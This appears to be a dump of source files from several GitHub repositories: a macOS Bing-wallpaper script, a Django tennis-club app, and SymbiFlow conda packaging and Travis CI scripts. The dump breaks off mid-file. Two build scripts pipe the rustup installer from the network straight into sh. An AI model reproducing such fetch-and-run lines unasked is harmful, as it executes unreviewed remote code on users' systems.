"language": "Shell", "length_bytes": 535, "license_type": "no_license", "max_line_length": 100, "num_lines": 13, "path": "/wallpaper_bing.sh", "repo_name": "anmac/ACWallpaper", "src_encoding": "UTF-8", "text": "#提取壁纸图片URL\nurl=$(expr \"$(curl http://cn.bing.com/?mkt=zh-CN |grep hprichbg)\" : \".*g_img={url: \\\"\\(.*\\)\\\",id.*\")\necho url=${url}\n#提取图片名称\nfilename=$(expr \"$url\" : \".*/\\(.*\\)\")\necho filename=${filename}\n#本地图片地址-当前用户下缺省图片目录\nlocalpath=\"/Users/$USER/Pictures/$filename\"\necho localpath=${localpath}\n#下载图片至本地\ncurl -o $localpath $url\n#调用Finder应用切换桌面壁纸\nosascript -e \"tell application \\\"Finder\\\" to set desktop picture to POSIX file \\\"$localpath\\\"\"\n\n\n\n\n" } ]
3
Championzb/TennisClub
https://github.com/Championzb/TennisClub
2f558b4452c5e6cf9b095d5ea57f43d65d66505e
1cbb764b30d127a55f51ca624aa832adb362bd74
d22fd0169fa4eeddc90618fa98aedd56b0ca7c7e
refs/heads/master
2020-12-25T04:30:06.631717
2014-05-22T00:01:01
2014-05-22T00:01:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7518796920776367, "alphanum_fraction": 0.7518796920776367, "avg_line_length": 26.60377311706543, "blob_id": "39f469868a7056675df275d43f0dde0cd6af2067", "content_id": "03c6c55e458d060d49fe7cd2bba985b66dc0c7a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1463, "license_type": "no_license", "max_line_length": 59, "num_lines": 53, "path": "/TennisFansA/Account/views.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.shortcuts import render_to_response\nfrom admin import UserCreationForm\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom models import MyUser\nfrom django.contrib import auth\nfrom django.http import HttpResponse\nfrom django.template import RequestContext\nfrom LeagueMatch.models import LeagueMatch\n\n\ndef Register(request):\n\tif request.method == 'POST':\n\t\tform = UserCreationForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('/Account/Register_Success')\n\telse:\n\t\tform = UserCreationForm()\n\n\targs = {}\n\targs.update(csrf(request))\n\n\targs['form']=form\n\n\treturn render_to_response('register.html', args)\n\ndef Register_Success(request):\n\treturn render_to_response('register_success.html')\n\ndef Login(request):\n\tc = {}\n\tc.update(csrf(request))\n\treturn render_to_response('login.html',c)\n\ndef Login_Success(request):\n\treturn render_to_response('login_success.html',\n\t\t\t\t\t\t\t{'email': request.user.email,\n\t\t\t\t\t\t\t 'league_matches': LeagueMatch.objects.all()})\n\t\ndef auth_view(request):\n\temail = request.POST.get('email', '')\n\tpassword = request.POST.get('password', '')\n\tuser = auth.authenticate(email=email,password=password)\n\t\n\tif user is not None: \n\t\tauth.login(request, user)\t\n\t\treturn HttpResponseRedirect('/Account/Login_Success')\n\telse:\n\t\treturn HttpResponseRedirect('/Account/Login_Failure')\n\ndef Login_Failure(request):\n\treturn render_to_response('login_failure.html')\n" }, { "alpha_fraction": 0.8402777910232544, "alphanum_fraction": 0.8402777910232544, "avg_line_length": 27.799999237060547, "blob_id": "261e0b2ac9e0d3eb8fadcfabcba3711aa27a07a7", "content_id": "9c0d678a8ca2ac6dbd90ea4e532e5e44f9a3b3d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 49, "num_lines": 5, "path": "/TennisFansA/LeagueMatch/admin.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom LeagueMatch.models import LeagueMatch, Match\n\nadmin.site.register(LeagueMatch)\nadmin.site.register(Match)\n" }, { "alpha_fraction": 0.720678985118866, "alphanum_fraction": 0.7438271641731262, "avg_line_length": 29.85714340209961, "blob_id": "3246add36de3748e8b054c664fa302ea20d32b63", "content_id": "2b558782c0052b622b5e82e22b124f24d6137b27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 64, "num_lines": 21, "path": "/TennisFansA/LeagueMatch/models.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Account.models import MyUser\n\nclass LeagueMatch(models.Model):\n\n\tCITY=(('1','Suzhou'),('2','Beijing'),('3','Shanghai'))\n\n\tname = models.CharField(max_length=100)\n\tstart_date = models.DateField()\n\tfinish_date = models.DateField()\n\tcity = models.CharField(max_length=3,choices=CITY, default='1')\n\tplayer = models.ManyToManyField(MyUser,blank=True)\n\n\t\n\nclass Match(models.Model):\n\tleagueMatch = models.ForeignKey(LeagueMatch)\n\tdate = models.DateField()\n\tplayer1 = models.ForeignKey(MyUser,related_name='player1')\n\tplayer2 = models.ForeignKey(MyUser,related_name='player2')\n\tscore = models.CharField(max_length = 200)\n" }, { "alpha_fraction": 0.741134762763977, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 28.526315689086914, "blob_id": "6700e4f066e81d3fee1def6f2bd83899ee677a6e", "content_id": "77643c46206c70d8cdc9154ed1c50fd8973d8e52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 69, "num_lines": 19, "path": "/TennisFansA/UserProfile/forms.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django import forms\nfrom models import Profile\nfrom localflavor.cn.forms import CNCellNumberField, CNProvinceSelect \n\nclass UserProfileForm(forms.ModelForm):\n\tphone = CNCellNumberField ()\n#\tprovince = forms.CharField(max_length=50,widget=CNProvinceSelect)\n\t\n\tclass Meta:\n\t\tmodel = Profile\n\t\tfields = ('username','level','gender','city')\n\n\tdef save(self,commit=True):\n\t\tform = super(UserProfileForm,self).save(commit=False)\n\t\tform.phone = self.cleaned_data['phone']\n#\t\tform.province = self.cleaned_data['province']\n\t\tif commit:\n\t\t\tform.save()\n\t\treturn form\n\n\t\n" }, { "alpha_fraction": 0.5666666626930237, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 7.5714287757873535, "blob_id": "613273974159e7b832814a001ff28bb7fa3711dd", "content_id": "ee77f1726a379fdbdd72538541cf5692dccbedaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "no_license", "max_line_length": 12, "num_lines": 7, "path": "/README.md", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "TennisClub\nMy commit\nFuck Haochen\n==========\n++++++\n\nksjdflksdjfl\n" }, { "alpha_fraction": 0.5490909218788147, "alphanum_fraction": 0.6242424249649048, "avg_line_length": 47.52941131591797, "blob_id": "e9deccd9448270df8150d35d3bb98b6ada0d9690", "content_id": "8b6a503ebdfab92b059fccf3166dd5d1642c79fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 177, "num_lines": 17, "path": "/TennisFansA/UserProfile/models.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Account.models import MyUser\n\n\nclass Profile(models.Model):\n\tLEVEL=(('1','1'),('1.5','1.5'),('2','2'),('2.5','2.5'),('3','3'),('3.5','3.5'),('4','4'),('4.5','4.5'),('5','5'),('5.5','5.5'),('6','6'),('6.5','6.5'),('7','7'),('7.5','7.5'),)\n\tGENDER=(('0','male'),('1','female'))\n\tCITY=(('1','Suzhou'),('2','Beijing'),('3','Shanghai'))\n\tuser = models.OneToOneField(MyUser,primary_key=True)\n\tusername = models.CharField(max_length = 100)\n\tlevel = models.CharField(max_length=15, choices=LEVEL, default='3')\n\tphone = models.CharField(max_length=11)\n#\tprovince = models.CharField(max_length=100)\n\tgender = models.CharField(max_length=2, choices=GENDER)\n\tcity = models.CharField(max_length=3,choices=CITY, default='1')\n\t\nMyUser.profile = property(lambda u: Profile.objects.get_or_create(user=u)[0])\n" }, { "alpha_fraction": 0.6876574158668518, "alphanum_fraction": 0.6876574158668518, "avg_line_length": 38.70000076293945, "blob_id": "881761b8caca7e09a6907cd8afe7066c721b02c2", "content_id": "e676facf3b4e0e3bd44f0aeae6b4feeadbd8de28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/TennisFansA/Account/urls.py", "repo_name": "Championzb/TennisClub", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nurlpatterns = patterns('',\n\turl(r'^Register/$', 'Account.views.Register'),\n\turl(r'^Register_Success/$', 'Account.views.Register_Success'),\n\turl(r'^Login/$', 'Account.views.Login'),\n\turl(r'^Login_Success/$', 'Account.views.Login_Success'),\n\turl(r'^auth/$', 'Account.views.auth_view'),\n\turl(r'^Login_Failure/$', 'Account.views.Login_Failure'),\n\n)\n" } ]
7
SymbiFlow/conda-packages
https://github.com/SymbiFlow/conda-packages
4670c4b71514ffa8b5f63fe1a92fbafb69ef5649
b5801b746eb21e8eff8050e74916e2cfdc83c6ae
a2b9f83788d78af67a113d10703c42fc5de52dee
refs/heads/master
2022-03-13T10:28:47.592274
2020-12-31T07:57:10
2020-12-31T07:57:10
144,771,639
3
12
Apache-2.0
2018-08-14T21:00:21
2020-12-31T07:57:14
2022-02-25T17:26:59
Shell
[ { "alpha_fraction": 0.694915235042572, "alphanum_fraction": 0.7097457647323608, "avg_line_length": 23.842105865478516, "blob_id": "67ff28762043cb11df71881ddfe0fcd1d25bdf76", "content_id": "044c02bccf788240287e15203b18caee65552c5e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 472, "license_type": "permissive", "max_line_length": 60, "num_lines": 19, "path": "/.travis/before_cache.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource .travis/common.sh\nset -e\n\n# Close the after_success.1 fold travis has created already.\ntravis_fold end before_cache\n\nstart_section \"conda.clean.1\" \"${GREEN}Clean status...${NC}\"\n#conda clean -s --dry-run\nend_section \"conda.clean.1\"\n\nstart_section \"conda.clean.2\" \"${GREEN}Cleaning...${NC}\"\nconda build purge\nend_section \"conda.clean.2\"\n\nstart_section \"conda.clean.3\" \"${GREEN}Clean status...${NC}\"\n#conda clean -s --dry-run\nend_section \"conda.clean.3\"\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6028571724891663, "avg_line_length": 20.875, "blob_id": "430a240527ce5a07f55e8a3ecda48571b13b195d", "content_id": "96fb19355db533cdce238a829a129d6f73a00392", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 350, "license_type": "permissive", "max_line_length": 69, "num_lines": 16, "path": "/flterm/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nset -x\nset -e\n\nmake CC=\"gcc -I.\"\nmake PREFIX=$PREFIX install\n\ngit describe | sed -e's/-/_/g' -e's/^v//' > ./__conda_version__.txt\ntouch .buildstamp\nTZ=UTC date +%Y%m%d_%H%M%S -r .buildstamp > ../__conda_buildstr__.txt\nTZ=UTC date +%Y%m%d%H%M%S -r .buildstamp > ../__conda_buildnum__.txt\n" }, { "alpha_fraction": 0.6653226017951965, "alphanum_fraction": 0.6693548560142517, "avg_line_length": 14.5, "blob_id": "1b1ef20ee91a372cab7fb3a035be8016bf07c63e", "content_id": "f4846da5a2793b3fb2fa21d2a49c4f914716850c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "permissive", "max_line_length": 49, "num_lines": 16, "path": "/moore/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncurl https://sh.rustup.rs -sSf | sh -s -- -y\nsource $HOME/.cargo/env\n\ncargo build --release\ninstall -D target/release/moore $PREFIX/bin/moore\n\n$PREFIX/bin/moore --version\n" }, { "alpha_fraction": 0.6907426118850708, "alphanum_fraction": 0.6988809704780579, "avg_line_length": 24.86842155456543, "blob_id": "12d8ca5b0189201e782f1e5d0e0ea79c221dc0a2", "content_id": "4343e0fec8549614a01d7edcea14f0ab3102dfd4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 983, "license_type": "permissive", "max_line_length": 109, "num_lines": 38, "path": "/.travis/after_success.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource .travis/common.sh\nset -e\n\n# Close the after_success fold travis has created already.\ntravis_fold end after_success\n\n# Remove trailing ';' and split CONDA_OUT into array of packages\nIFS=';' read -r -a PACKAGES <<< \"${CONDA_OUT%?}\"\n\nstart_section \"package.contents\" \"${GREEN}Package contents...${NC}\"\nfor element in \"${PACKAGES[@]}\"\ndo\n\ttar -jtf $element | sort\ndone\nend_section \"package.contents\"\n\nif [ x$TRAVIS_BRANCH = x\"master\" -a x$TRAVIS_EVENT_TYPE != x\"cron\" -a x$TRAVIS_PULL_REQUEST == xfalse ]; then\n\t$SPACER\n\n\tfor element in \"${PACKAGES[@]}\"\n\tdo\n\t\tstart_section \"package.upload\" \"${GREEN}Package uploading...${NC}\"\n\t\tanaconda -t $ANACONDA_TOKEN upload --user $ANACONDA_USER --label main $element\n\t\tend_section \"package.upload\"\n\tdone\n\nfi\n\n$SPACER\n\nstart_section \"success.tail\" \"${GREEN}Success output...${NC}\"\necho \"Log is $(wc -l /tmp/output.log) lines long.\"\necho \"Displaying last 1000 lines\"\necho\ntail -n 1000 /tmp/output.log\nend_section \"success.tail\"\n" }, { "alpha_fraction": 0.6219512224197388, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 17.923076629638672, "blob_id": "9a6819dd4b0dc59ca1b54f578c606af2667df25f", "content_id": "b3e08ff986fb128dd55072114426873d07dc4f6b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 984, "license_type": "permissive", "max_line_length": 68, "num_lines": 52, "path": "/verilator/run_test.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset +x\n\n$PREFIX/bin/verilator -V\n#$PREFIX/bin/verilator --help || true\n\nfunction run {\n\tFILENAME=$1\n\trm -rf sim_main.cpp\n\trm -rf obj_dir\n\n\tcat <<EOF >sim_main.cpp\n#include \"V$FILENAME.h\"\n#include \"verilated.h\"\nint main(int argc, char **argv, char **env) {\n Verilated::commandArgs(argc, argv);\n V$FILENAME* top = new V$FILENAME;\n while (!Verilated::gotFinish()) { top->eval(); }\n exit(0);\n}\nEOF\n\t$PREFIX/bin/verilator --cc $FILENAME.v $2 $3 --exe sim_main.cpp\n\tcd obj_dir\n\tcat V$FILENAME.mk\n\tmake -j -f V$FILENAME.mk V$FILENAME\n\tcd ..\n\tobj_dir/V$FILENAME\n\n\trm -rf sim_main.cpp\n\trm -rf obj_dir\n}\n\ncd test\n\n# Hello world test\necho\necho\necho \"Hello World Test =====\"\nrun hello_world\necho \"----------------------\"\n\n# Counter\necho\necho\necho \"Counter Test =========\"\n# FIXME\n# %Error: counter_tb.v:21: Unsupported or unknown PLI call: $monitor\n# %Error: counter.v:18: Unsupported: Verilog 1995 deassign\n#run counter_tb counter.v\necho \"----------------------\"\n" }, { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.6556291580200195, "avg_line_length": 11.583333015441895, "blob_id": "5da42a8c2aa25492f69388e5925e121da75d4adf", "content_id": "4f82d58fac3f03860a6d4be073e4e1ba0971af87", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 151, "license_type": "permissive", "max_line_length": 38, "num_lines": 12, "path": "/odin_II/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncd ODIN_II\nmake build -j$CPU_COUNT\ninstall -D odin_II $PREFIX/bin/odin_II\n" }, { "alpha_fraction": 0.7119205594062805, "alphanum_fraction": 0.7185430526733398, "avg_line_length": 11.583333015441895, "blob_id": "e9a1659754ed63d73a33a230edf70e96e7f430af", "content_id": "bf1ff7ca397526d33bbe94d0e5f43944a041a255", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 302, "license_type": "permissive", "max_line_length": 37, "num_lines": 24, "path": "/antmicro-yosys/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\n#unset CFLAGS\n#unset CXXFLAGS\n#unset CPPFLAGS\n#unset DEBUG_CXXFLAGS\n#unset DEBUG_CPPFLAGS\n#unset LDFLAGS\n\nwhich pkg-config\n\ncd yosys\n\nmake V=1 -j$CPU_COUNT\ncp yosys \"$PREFIX/bin/antmicro-yosys\"\n\n$PREFIX/bin/antmicro-yosys -V\n" }, { "alpha_fraction": 0.5857843160629272, "alphanum_fraction": 0.6066176295280457, "avg_line_length": 26.6610164642334, "blob_id": "dd2f862b2d420390bc8ea1668ddd40b020a771a4", "content_id": "227bc2cac012aaf4aea830a7d0be951bfc434dd8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3264, "license_type": "permissive", "max_line_length": 166, "num_lines": 118, "path": "/.travis/common.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "# Some colors, use it like following;\n# echo -e \"Hello ${YELLOW}yellow${NC}\"\nGRAY=' \\033[0;30m'\nRED=' \\033[0;31m'\nGREEN=' \\033[0;32m'\nYELLOW=' \\033[0;33m'\nPURPLE=' \\033[0;35m'\nNC='\\033[0m' # No Color\n\nSPACER=\"echo -e ${GRAY} - ${NC}\"\n\nexport -f travis_nanoseconds\nexport -f travis_fold\nexport -f travis_time_start\nexport -f travis_time_finish\n\nTRAVIS_MAX_TIME=50\n\n# Override default travis_wait to pipe the output\ntravis_wait() {\n\tlocal timeout=\"${1}\"\n\n\tif [[ \"${timeout}\" =~ ^[0-9]+$ ]]; then\n\t\tshift\n\telse\n\t\ttimeout=20\n\tfi\n\n\tlocal cmd=(\"${@}\")\n\tlocal log_file=\"travis_wait_${$}.log\"\n\n\t\"${cmd[@]}\" &\n\tlocal cmd_pid=\"${!}\"\n\n\ttravis_jigger \"${!}\" \"${timeout}\" \"${cmd[@]}\" &\n\tlocal jigger_pid=\"${!}\"\n\tlocal result\n\n\t{\n\t\twait \"${cmd_pid}\" 2>/dev/null\n\t\tresult=\"${?}\"\n\t\tps -p\"${jigger_pid}\" &>/dev/null && kill \"${jigger_pid}\"\n\t}\n\n\tif [[ \"${result}\" -eq 0 ]]; then\n\t\tprintf \"\\\\n${ANSI_GREEN}The command %s exited with ${result}.${ANSI_RESET}\\\\n\" \"${cmd[*]}\"\n\telse\n\t\tprintf \"\\\\n${ANSI_RED}The command %s exited with ${result}.${ANSI_RESET}\\\\n\" \"${cmd[*]}\"\n\tfi\n\n\techo -e \"\\\\n${ANSI_GREEN}Log:${ANSI_RESET}\\\\n\"\n\n\treturn \"${result}\"\n}\n\n# Override default travis_jigger to print invisible character to keep build alive\ntravis_jigger() {\n\tlocal cmd_pid=\"${1}\"\n\tshift\n\tlocal timeout=\"${1}\"\n\tshift\n\tlocal count=0\n\n\techo -e \"\\\\n\"\n\n\twhile [[ \"${count}\" -lt \"${timeout}\" ]]; do\n\t\tcount=\"$((count + 1))\"\n\t\t# print invisible character\n\t\techo -ne \"\\xE2\\x80\\x8B\"\n\t\tsleep 60\n\tdone\n\n\techo -e \"\\\\n${ANSI_RED}Timeout (${timeout} minutes) reached. Terminating \\\"${*}\\\"${ANSI_RESET}\\\\n\"\n\tkill -9 \"${cmd_pid}\"\n}\n\nif [ -z \"$DATE_STR\" ]; then\n\texport DATE_TS=\"$(git log --format=%ct -n1)\"\n\texport DATE_NUM=\"$(date --date=@${DATE_TS} -u +%Y%m%d%H%M%S)\"\n\texport DATE_STR=\"$(date --date=@${DATE_TS} -u +%Y%m%d_%H%M%S)\"\n\techo \"Setting date number to $DATE_NUM\"\n\techo \"Setting date string to $DATE_STR\"\nfi\n\nfunction start_section() {\n\ttravis_fold start \"$1\"\n\ttravis_time_start\n\techo -e \"${PURPLE}${PACKAGE}${NC}: - $2${NC}\"\n\techo -e \"${GRAY}-------------------------------------------------------------------${NC}\"\n}\n\nfunction end_section() {\n\techo -e \"${GRAY}-------------------------------------------------------------------${NC}\"\n\ttravis_time_finish\n\ttravis_fold end \"$1\"\n}\n\n# Disable this warning;\n# xxxx/conda_build/environ.py:377: UserWarning: The environment variable\n# 'TRAVIS' is being passed through with value 0. If you are splitting\n# build and test phases with --no-test, please ensure that this value is\n# also set similarly at test time.\nexport PYTHONWARNINGS=ignore::UserWarning:conda_build.environ\n\nexport BASE_PATH=\"/tmp/really-really-really-really-really-really-really-really-really-really-really-really-really-long-path\"\nexport CONDA_PATH=\"$BASE_PATH/conda\"\nmkdir -p \"$BASE_PATH\"\nexport PATH=\"$CONDA_PATH/bin:$PATH\"\n\nexport GIT_SSL_NO_VERIFY=1\nexport GITREV=\"$(git describe --long 2>/dev/null || echo \"unknown\")\"\nexport CONDA_BUILD_ARGS=$PACKAGE\nexport CONDA_OUT=\"$(conda render --output $CONDA_BUILD_ARGS 2> /dev/null | grep conda-bld | grep tar.bz2 | sed -e's/-[0-9]\\+\\.tar/*.tar/' -e's/-git//' | tr '\\n' ';')\"\n\necho \" GITREV: $GITREV\"\necho \" CONDA_PATH: $CONDA_PATH\"\necho \"CONDA_BUILD_ARGS: $CONDA_BUILD_ARGS\"\necho \" CONDA_OUT: $CONDA_OUT\"\n" }, { "alpha_fraction": 0.6759259104728699, "alphanum_fraction": 0.6790123581886292, "avg_line_length": 15.199999809265137, "blob_id": "3e043f8a98f26d08f80a0ca22a1932c91bbd3c89", "content_id": "f5609f132fa8eddb7981887cdd90c71ebce8cef8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 324, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/verilator/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#! /bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nunset VERILATOR_ROOT\nln -s /usr/bin/perl $PREFIX/bin/\nautoconf\n./configure \\\n --prefix=$PREFIX \\\n\nmake -j$CPU_COUNT\nmake install\n\n# Fix hard coded paths in verilator\nsed -i -e's-/.*_build_env/bin/--' $PREFIX/share/verilator/include/verilated.mk\n" }, { "alpha_fraction": 0.7277353405952454, "alphanum_fraction": 0.732824444770813, "avg_line_length": 22.058822631835938, "blob_id": "6d81c6e001e36345d72e1eb0c98f77485fc806c8", "content_id": "8809dcb90936624bc5d9c6130090a61610136830", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 393, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/uhdm-integration/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\nexport PKG_CONFIG_PATH=\"$BUILD_PREFIX/lib/pkgconfig/\"\nexport CXXFLAGS=\"$CXXFLAGS -I$BUILD_PREFIX/include\"\nexport LDFLAGS=\"$CXXFLAGS -L$BUILD_PREFIX/lib -lrt -ltinfo\"\n\nmake -j$CPU_COUNT surelog/parse\nmake -j$CPU_COUNT uhdm/build\nmake -j$CPU_COUNT uhdm/verilator/build\nmake -j$CPU_COUNT ENABLE_READLINE=0 yosys/yosys\n\n" }, { "alpha_fraction": 0.6771929860115051, "alphanum_fraction": 0.680701732635498, "avg_line_length": 16.8125, "blob_id": "6b415266437d5a29088c942943fa2939dcc2ebe2", "content_id": "22e24f67cb28ed8f6f275a3dda568723afc0dce5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 285, "license_type": "permissive", "max_line_length": 64, "num_lines": 16, "path": "/sv-parser/build.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\nset -x\n\nif [ x\"$TRAVIS\" = xtrue ]; then\n\tCPU_COUNT=2\nfi\n\ncurl https://sh.rustup.rs -sSf | sh -s -- -y\nsource $HOME/.cargo/env\n\ncargo build --example parse_sv --release\ninstall -D target/release/examples/parse_sv $PREFIX/bin/parse_sv\n\n$PREFIX/bin/parse_sv --version\n" }, { "alpha_fraction": 0.603412389755249, "alphanum_fraction": 0.6146483421325684, "avg_line_length": 19.024999618530273, "blob_id": "46393169c72df2dd5272e517ba9a17faceb9aff2", "content_id": "17a3ff214d7181eb9428eb5bd57877c59a861396", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2403, "license_type": "permissive", "max_line_length": 85, "num_lines": 120, "path": "/.travis-output.py", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport io\nimport pexpect\nimport re\nimport string\nimport sys\nimport time\n\noutput_to=sys.stdout\n\nargs = list(sys.argv[1:])\nlogfile = open(args.pop(0), \"w\")\nchild = pexpect.spawn(' '.join(args))\n\ndef output_line(line_bits, last_skip):\n line = \"\".join(line_bits)\n line = re.sub(\"/really.*/conda/\", \"/.../conda/\", line)\n line = re.sub(\"/_b_env_[^/]*/\", \"/_b_env_.../\", line)\n sline = line.strip()\n\n skip = True\n if line.startswith(\" \") and not sline.startswith('/'):\n skip = False\n\n if \"da es fi\" in sline:\n skip = True\n if \"setting rpath\" in sline:\n skip = True\n\n if \"Entering directory\" in sline:\n skip = False\n sline = sline.split('make')[-1]\n\n if re.search(\"[0-9]+\\.[0-9]+\", line):\n skip = False\n\n if len(sline) > 1:\n if sline[0] in string.ascii_uppercase and sline[1] not in string.ascii_uppercase:\n skip = False\n if sline[0] in ('[', '=', '!', '+'):\n skip = False\n\n if skip != last_skip:\n output_to.write('\\n')\n\n if skip:\n output_to.write('.')\n else:\n output_to.write(line)\n\n output_to.flush()\n line_bits.clear()\n return skip\n\n\ndef find_newline(data):\n fulldata = b\"\".join(data)\n newlinechar = fulldata.find(b'\\n')\n retlinechar = fulldata.find(b'\\r')\n\n if newlinechar == -1:\n newlinechar = len(fulldata)+1\n if retlinechar == -1:\n retlinechar = len(fulldata)+1\n\n if retlinechar+1 == newlinechar:\n splitpos = newlinechar\n else:\n splitpos = min(newlinechar, retlinechar)\n\n if splitpos > len(fulldata):\n return\n\n newline = fulldata[:splitpos+1]\n leftover = fulldata[splitpos+1:]\n\n data.clear()\n data.append(leftover)\n return newline\n\n\nlast_skip = False\ncont = []\ndata = [b'']\nwhile True:\n line = None\n while len(data) > 1 or len(data[0]) > 0 or child.isalive():\n line = find_newline(data)\n if line is not None:\n break\n try:\n data.append(child.read_nonblocking(100))\n except pexpect.TIMEOUT:\n pass\n except pexpect.EOF as e:\n data.append(b'\\n')\n\n if not line:\n break\n\n line = line.decode('utf-8')\n logfile.write(line)\n logfile.flush()\n\n if line.endswith('\\r'):\n cont.append(line[:-1])\n last_skip = output_line(cont, last_skip)\n cont.append('\\r')\n continue\n\n sline = line.strip('\\n\\r')\n cont.append(sline)\n if sline.endswith('\\\\'):\n continue\n\n cont.append('\\n')\n last_skip = output_line(cont, last_skip)\n\nsys.exit(child.exitstatus)\n" }, { "alpha_fraction": 0.700127899646759, "alphanum_fraction": 0.7116368412971497, "avg_line_length": 23.4375, "blob_id": "0d486444261df352113855796a6d3c176c8e5016", "content_id": "a58d00a87584dc29dabf15efbd5d4436aee95065", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1564, "license_type": "permissive", "max_line_length": 83, "num_lines": 64, "path": "/conda-get.sh", "repo_name": "SymbiFlow/conda-packages", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -e\n\nCONDA_PATH=${1:-~/conda}\n\necho \"Downloading Conda installer.\"\nwget -c https://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh\nchmod a+x Miniconda3-latest-Linux-x86_64.sh\n\nif [ ! -d $CONDA_PATH ]; then\n\techo \"Installing conda\"\n ./Miniconda3-latest-Linux-x86_64.sh -p $CONDA_PATH -b -f\nfi\nexport PATH=$CONDA_PATH/bin:$PATH\n\nfunction patch_conda() {\n\t# Patch conda to prevent a users ~/.condarc from infecting the build\n\tfor F in $CONDA_PATH/lib/python3.*/site-packages/conda/common/configuration.py; do\n\t\tif grep -q \"# FIXME: Patched conda\" $F; then\n\t\t\techo \"Already patched $F\"\n\t\telse\n\t\t\techo \"Patching $F\"\n\t\t\tcat >> $F <<'EOF'\n\n# FIXME: Patched conda\n_load_file_configs = load_file_configs\ndef load_file_configs(search_path):\n return _load_file_configs([p for p in search_path if 